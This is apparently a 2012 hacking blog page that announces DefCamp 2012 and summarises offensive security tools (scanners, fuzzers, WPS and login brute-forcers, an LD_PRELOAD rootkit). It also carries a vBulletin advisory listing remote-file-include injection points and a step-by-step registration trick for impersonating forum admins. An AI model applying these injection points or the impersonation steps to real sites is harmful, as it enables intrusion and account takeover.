DefCamp 2012 – Romania Bucharest
What?
DefCamp 2012. Second edition of the Romanian conference dedicated to IT Security or as the organizers declare, in-security. The idea of DefCamp came out in March 2011, after some informal discussions between more computer security addicts from Romania, passionate about various INFOSEC topics.
When?
Friday, November 30, 2012 at 9:00 AM - Sunday, December 2, 2012 at 6:00 PM (PST) Bucharest, Romania. 44.441682,26.059049 to be more precisely. https://plus.google.com/109940733198368750319/about?gl=ro&hl=ro
Who?
Unlike the first edition of DefCamp where mostly Romanian underground security specialists enthusiasts were present this year the event is backedup by KPMG Romania.
And I really have to mention the following:
- Jim Manico, VP of Security Architecture at WhiteHat Security and VP OWASP with over 16 years of experience in IT security
- Andras Kabai, Senior IT Security Specialist at Deloitte
- Marian Ventuneac, Security Architect at Genworth Financial and Founder OWASP Ireland-Limerick Chapter
- Alexandru Bălan, Chief Security Researcher at Bitdefender
- Adrian Furtună, Security Consultant at KPMG România and international speaker at IT security conferences
- Bogdan Alecu, System Administrator and international speaker at IT security conferences
Some of the topics discussed will be: 0days, captcha breaking, digipass bypass, mobile security, android malware, DDOS, networking, P2P networks, D&D APT’s, social engineering and baking muffins.
Why?
If grey-hat, black-hat, blue-hat or white-hat means more to you then fashion, you should join. There will be security workshops, forensic, cracking, hacking and polo contests. Also it is very important that you keep up with the latest topics in this very dincamic field.
Another reason to join is helping this event to become the best running hacker convention around Eastern Europe.
Official website: http://www.defcamp.ro/
Official Facebook page: http://www.facebook.com/pages/DefCamp/116250668472724
And: http://www.worldit.info/articole/defcamp-2012-bucuresti-un-eveniment-hipnotizant-tu-ai-vazut-prezentarile/
Buy your ticket here: http://defcamp2012-es2.eventbrite.com/?rank=1#
IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text, Http-Only /Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to
- identify vulnerabilities
- Executed only when the user explicitly
- calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs Taint Analysis forDOM based XSS, identifies Sources and Sinks and traces them through the code. Also custom Source and Sink objects can be configured.
web-sorrow – server security scanner
A perl based tool for misconfiguration, version detection, enumeration, and server information scanning. Web-Sorrow is a "safe to run" program. meaning it is not designed attempt to exploit or preform any kind of injection, DDoS/DoS, CSRF, XSS, or any harmful attacks. It's entirely focused on Enumeration and collecting Info on the target server.
CURRENT functionality:
-S - stands for standard. a set of Standard tests and includes: indexing of directories testing, banner grabbing, language detection (should be obvious), robots.txt, 200 response testing (some servers send a 200 ok for every req), and thumbs.db scanning
-auth - looks for login pages with a list of some of the most common login files and dirs and admin consoles. don't need to be very big list of URLs because what else are going to name it? notAlogin.php???
-Cp - scan with a huge list of plugins dirs. the list is a bit old (Drupal and wordpress plugins databases are now current but sorry joomla's still a bit old)
-I - searches the responses for interesting strings
-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info
-Fd - look for generally things people don't want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting.
-ninja - A light weight and undetectable scan that uses bits and peaces from other scans
-R - use http range headers to make scans faster
-Shadow - Use Google cache instead of requesting from the target host
-Sd - Bruteforce Sub Domains
-Db - Bruteforce Directories with the big dirbuster Database
-ua - use a custom UserAgent. PUT UA IN QUOTES if there's spaces
-proxy - send all http reqs via a proxy. example: 255.255.255.254:8080
-e - run all the scans in the tool
web-sorrow also has false positives checking on most of it's requests (it pretty accurate but not perfect)
EXAMPLES:
- basic: perl Wsorrow.pl -host scanme.nmap.org -S
- stealthy: perl Wsorrow.pl -host scanme.nmap.org -ninja -proxy 190.145.74.10:3128
- scan for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
- CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
- most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e
- dump http headers: perl headerDump.pl
- Check if host is alive: perl hdt.pl -host 192.168.1.1
CONTACT: @flyinpoptartcat
DotDotPwn v3.0 The Directory Traversal Fuzzer
Version: DotDotPwn v3.0
Release date: 03/Feb/2012 (Release at BugCon Security Conferences 2012)
Changes / Enhancements / Features:
- -X switch that implements the Bisection Algorithm in order to detect the exact deepness once a directory traversal vulnerability has been found. - http://en.wikipedia.org/wiki/Bisection_method
- -M switch to specify another method different from the default (GET) when the http module is used.
- Other HTTP methods are [POST | HEAD | COPY | MOVE]
- -e switch to specify the file extension to be appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
- New dots & slashes encodings (fuzz patterns) based on: https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode and http://wikisecure.net/security/uri-encoding-to-bypass-idsips
Supported modules:
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT
Feel free to download this new release from the following sites:
Contact us: dotdotpwn@sectester.net
Reaver – brute force Wifi Protected Setup
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Patator multi-purpose brute-forcer
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* http_fuzz : Brute-force HTTP/HTTPS
* pop_passd : Brute-force poppassd (not POP3)
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Forward lookup subdomains
* dns_reverse : Reverse lookup subnets
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo
Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting.
vBulletin Multiple Remote File Include Vulnerabilities
vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
vBulletin 4.1.7 is vulnerable; other versions may also be affected.
[cc lang="html"]http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] [/cc]
Jynx Kit (LD_PRELOAD) Userland Rootkit Released
Jynx Kit is a LD_PRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LD_PRELOAD rootkits.
GXFR – Search Engine Domain Transfer – discover subdomains
Advanced search engine queries to discover subdomains, replicating a dns zone transfer when zone transfers are disabled on the dns server. Basically, the technique involves making search engine requests which restrict the url and site to the target domain. Then, based on the results of the search, excluding the subdomains that are returned. Repeat until the search engine returns 0 results. The final search query excludes all of the public facing subdomains that the search engine is aware of. Conduct a dns look-up of each of the identified subdomains, and you’ve got yourself a dns zone transfer of all the subdomains with public facing web servers.
vBulletin – Registration Bypass Vulnerability
1. Check the names of the admins/moderators on the forums
2. Go to Http://[localhost]/path/register.php
3. [cc lang="html"]Type this at User Name ===> ADMIN_username�[/cc]
4. [cc lang="html"]� is an ASCII Code[/cc]
5. complete the other parameters
6. Then click on Complete Registration
7. Now you see that your user name like admin user name
8. PM the moderators to elevate your account or promote another user. (or other nutty things)
(this is old but its still working)
Author: Immortal Boy
Iranian Datacoders Security Team
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
